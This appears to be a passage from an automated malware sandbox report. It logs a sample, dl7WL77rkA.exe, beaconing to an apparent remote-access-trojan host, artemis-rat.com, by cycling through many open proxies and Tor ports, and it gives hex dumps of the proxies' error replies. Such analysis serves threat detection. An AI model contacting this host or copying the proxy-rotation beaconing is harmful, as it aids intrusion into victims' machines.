                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            474192.168.2.551172218.57.210.18690023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.386538029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.836564064 CET311INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:13:06 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            475192.168.2.551297121.182.138.71803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.387923956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.687503099 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            476192.168.2.55040870.166.167.38577283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.414202929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            477192.168.2.551324220.134.221.7611313876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.419703007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:01.024126053 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            478192.168.2.55038551.158.79.76163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.419845104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.751872063 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            479192.168.2.55134813.37.89.20131283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.421647072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.721189022 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            480192.168.2.55146852.189.35.880003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.421782017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.624021053 CET176INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Length: 19
                                                                                                                                                                                                                                                            Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                                                                                                                                                            Data Ascii: 404 page not found


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            481192.168.2.55135138.41.27.150112013876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.421829939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.076714993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.998929977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.905143976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.067447901 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            482192.168.2.55135527.96.235.171803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.421902895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.723462105 CET326INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            483192.168.2.55144038.162.9.20331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.421905994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.873076916 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            484192.168.2.55126083.219.145.10831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.422621012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.837191105 CET202INHTTP/1.0 403 Forbidden
                                                                                                                                                                                                                                                            Content-Length: 711
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            485192.168.2.551198112.109.16.5180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.424886942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            486192.168.2.55134951.255.20.138803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.427745104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.765221119 CET803INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:06 GMT
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            Content-Length: 620
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2c 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 61 6e 64 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 61 6e 64 20 61 6e 79 74 68 69 6e 67 20 79 6f 75 20 6d 69 67 68 74 20 68 61 76 65 20 64 6f 6e 65 20 74 68 61 74 20 6d 61 79 20 68 61 76 65 0a 63 61 75 73 65 64 20 74 68 65 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator, [no address given] and inform them of the time the error occurred,and anything you might have done that may havecaused the error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.2.16 (Debian) Server at artemis-rat.com Port 443</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            487192.168.2.55136460.188.102.225180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.429183006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            488192.168.2.551460162.214.225.223434353876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.430577040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.967328072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.639256954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
